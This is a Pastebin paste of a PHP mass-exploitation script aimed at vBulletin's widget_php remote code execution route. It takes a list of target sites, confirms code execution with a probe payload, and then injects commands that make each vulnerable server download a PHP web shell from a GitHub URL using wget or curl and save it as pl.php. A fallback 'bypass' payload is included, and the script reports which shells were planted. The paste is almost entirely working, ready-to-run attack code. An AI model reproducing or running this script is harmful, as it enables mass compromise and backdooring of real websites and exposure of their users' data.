SHARE
TWEET

Haha wibu

a guest Nov 1st, 2019 27 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. ### Con7ext
  3. ### Exploit-Kita
  4. function xCurl($url, $post = null){
  5.   $x = curl_init();
  6.   curl_setopt($x, CURLOPT_URL, $url);
  7.   curl_setopt($x, CURLOPT_RETURNTRANSFER, true);
  8.   curl_setopt($x, CURLOPT_TIMEOUT, 5);
  9.   if($post && !empty($post)){
  10.     curl_setopt($x, CURLOPT_POSTFIELDS, $post);
  11.   }
  12.   $xx = curl_exec($x);
  13.   $h = curl_getinfo($x, CURLINFO_HTTP_CODE);
  14.   return [
  15.     "head" => $h,
  16.     "body" => $xx
  17.   ];
  18. }
  19. if(!$argv[1]){
  20.   exit("Usage: php ".$argv[0]." <LIST>");
  21. }
  22. $bl = "\033[0;34m";
  23. $gr = "\033[0;32m";
  24. $re = "\033[0;31m";
  25. $wh = "\033[1;37m";
  26. $shellname = "pl.php"; // setting uploader name
  27. $payloadV = "routestring=ajax/render/widget_php&widgetConfig[code]=echo 'rintod'; exit;";
  28. $payloadS = 'routestring=ajax/render/widget_php&widgetConfig[code]=$c = popen("wget https://raw.githubusercontent.com/rintod/toolol/master/payload.php -O '.$shellname.'"); echo fread($c, 1024); exit;';
  29. $payloadB = 'routestring=ajax/render/widget_php&widgetConfig[code]=$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://raw.githubusercontent.com/rintod/toolol/master/payload.php"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $ajg = curl_exec($ch);$f=fopen("'.$shellname.'", "a+");fwrite($f, $ajg);fclose($f);echo "rintod";exit;';
  30. $m = file_get_contents($argv[1]);
  31. $c = explode("\n", $m);
  32. echo "
  33.       __________      .__  .__          __  .__        
  34. ___  _\______   \__ __|  | |  |   _____/  |_|__| ____  
  35. \  \/ /|    |  _/  |  \  | |  | _/ __ \   __\  |/    \
  36.  \   / |    |   \  |  /  |_|  |_\  ___/|  | |  |   |  \
  37.   \_/  |______  /____/|____/____/\___  >__| |__|___|  /
  38. Exploit-Kita  \/     MASS EXPLOIT    \/   Con7ext   \/\n
  39. ";
  40. foreach($c as $s){
  41.   $mek = xCurl($s, $payloadV);
  42.   if(preg_match("/rintod/", $mek["body"])){
  43.     echo "[$bl+$wh] ". $s . " > {$gr}Vuln$wh\n";
  44.     //echo $mek["body"];
  45.     echo "[$bl+$wh] {$bl}Uploading Shell$wh\n";
  46.     xCurl($s, $payloadS);
  47.     echo "[$bl+$wh] {$bl}Checking Shell$wh\n";
  48.     $moe = xCurl($s."/".$shellname);
  49.     if($moe["head"] == 200){
  50.       echo "[$bl+$wh] {$gr}{$s}/$shellname > Shell Found$wh\n\n";
  51.     }
  52.     else{
  53.       echo "[$re-$wh] {$re}{$s}/$shellname > Shell Not Found $wh [$gr!$wh] {$bl}Trying To Bypass!!!$wh\n";
  54.       echo "[$bl+$wh] {$bl}Get Content$wh\n";
  55.       $mox = xCurl($s, $payloadB);
  56.       if(preg_match("/rintod/", $mox["body"])){
  57.         echo "[$bl+$wh] {$gr}{$s}/$shellname > Bypass Success$wh\n\n";
  58.       }
  59.       else{
  60.         echo "[$re-$wh] {$re}{$s}/$shellname > Bypass Failed $wh [$bl!$wh] Try Manual\n\n";
  61.         //echo $mox["body"];
  62.       }
  63.     }
  64.   }
  65.   else{
  66.     echo "[$re-$wh] {$re}". $s . " > Failed$wh\n\n";
  67.   }
  68. }
  69. echo $wh;
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top